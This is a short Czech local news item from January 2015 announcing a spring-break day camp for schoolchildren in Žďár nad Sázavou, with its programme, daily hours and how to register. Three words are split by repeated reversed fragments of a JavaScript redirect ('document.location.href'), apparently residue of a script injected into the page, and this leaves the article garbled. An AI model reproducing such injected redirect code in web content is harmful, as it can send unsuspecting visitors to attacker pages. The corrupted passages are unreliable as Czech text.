tábor
Rainbow page separator

Děti mohou jarní prázdniny trávit v příměstském táboře

Pátek, 9. ledna 2015

Žďár nad Sázavou / V době jarních prázdnin od 2. do 6. února se mohou školní děti zúčastnit jarního příměstského tábora, který pořádá žďárská organizace Active – středisko volného času. Pro děti organizá[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toři přichystají různorodý program – například počítačové hry, rukodělné dílny, spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovní soutěže, vycházky do okolí Žďáru a další zábavné činnosti. Sraz účastníků příměstského tábora bude vždy v osm hodin ráno v domě dětí a mládeže v Horní ulici, konec programu je plánován o půl čtvrté odpoledne. S sebou si zúčastněné děti přinesou jídlo na celý den.
Přihlášky na příměstský tábor jsou přijímány buď prostřednictvím webových stránek www.activezdar.cz, anebo přímo v pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torách zařízení Active – SVČ v Horní, či v Dolní ulici.